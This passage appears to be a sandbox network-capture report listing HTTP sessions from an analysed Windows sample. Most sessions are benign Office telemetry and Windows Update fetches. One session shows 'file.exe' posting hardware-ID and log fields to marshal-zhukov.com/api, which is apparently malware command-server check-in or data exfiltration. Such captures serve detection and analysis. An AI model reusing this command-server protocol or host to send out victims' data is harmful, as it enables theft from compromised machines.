                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:34 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 499
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                              x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153134Z-174f7845968jrjrxhC1EWRmmrs0000000x5000000000n3yf
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              31192.168.2.104974013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:35 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:35 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                              x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153135Z-174f7845968zgtf6hC1EWRqd8s0000000pzg00000000pgxn
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:35 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              32192.168.2.104973913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:35 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:35 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                              x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153135Z-174f78459685726chC1EWRsnbg0000000x2000000000pt8p
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:35 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              33192.168.2.1049744172.67.160.804438100C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:36 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=B9O6HX2J9JNTFWB3RV
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 15079
                                                                                                                                                                                                                                                              Host: marshal-zhukov.com
                                                                                                                                                                                                                                                              2024-11-27 15:31:36 UTC15079OUTData Raw: 2d 2d 42 39 4f 36 48 58 32 4a 39 4a 4e 54 46 57 42 33 52 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 30 43 30 37 45 30 34 38 36 37 35 41 44 44 34 45 33 33 45 43 42 36 31 41 39 30 37 39 35 43 0d 0a 2d 2d 42 39 4f 36 48 58 32 4a 39 4a 4e 54 46 57 42 33 52 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 39 4f 36 48 58 32 4a 39 4a 4e 54 46 57 42 33 52 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                                                                                              Data Ascii: --B9O6HX2J9JNTFWB3RVContent-Disposition: form-data; name="hwid"700C07E048675ADD4E33ECB61A90795C--B9O6HX2J9JNTFWB3RVContent-Disposition: form-data; name="pid"2--B9O6HX2J9JNTFWB3RVContent-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC1045INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:37 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=7i425ehdttlhfh45se6brfv7cq; expires=Sun, 23-Mar-2025 09:18:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QK1qpjPZlomZPmGWOu%2BSGOlnI7%2BxRkluJR6EvrZ2gAPxX97i60l6c%2Bnt2hYiDmW79dvM8KrDRPSJvMxASflxPpq90e872RfNRPs0dTK%2BmVXAi7kTNOhCTuih16ovm7LesfvOh50%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8e932a891f90c484-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1634&rtt_var=625&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16021&delivery_rate=1731909&cwnd=248&unsent_bytes=0&cid=f7a317e0e7b4f61e&ts=1292&x=0"
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              34192.168.2.104974113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:36 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:36 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                              x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153136Z-174f7845968cdxdrhC1EWRg0en0000000x2g00000000d5p5
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:36 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              35192.168.2.104974213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:36 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:36 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                              x-ms-request-id: a230c581-101e-0034-3128-4096ff000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153136Z-174f7845968frfdmhC1EWRxxbw0000000x5000000000ddqk
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              36192.168.2.104974313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:36 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:36 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 420
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                              x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153136Z-174f7845968kdththC1EWRzvxn00000009f000000000d3ba
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              37192.168.2.104973852.149.20.212443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:36 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=TxBTEvPUg8ROmxr&MD=Lngvz3xX HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                              MS-CorrelationId: 62d214fb-5ab2-4e37-9a19-7d957e03d733
                                                                                                                                                                                                                                                              MS-RequestId: 680878af-59b3-4990-8325-3aebec312326
                                                                                                                                                                                                                                                              MS-CV: K4ebs4epZECrsUFR.0
                                                                                                                                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:36 GMT
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 24490
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              38192.168.2.104974613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:37 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                                              Connection: close
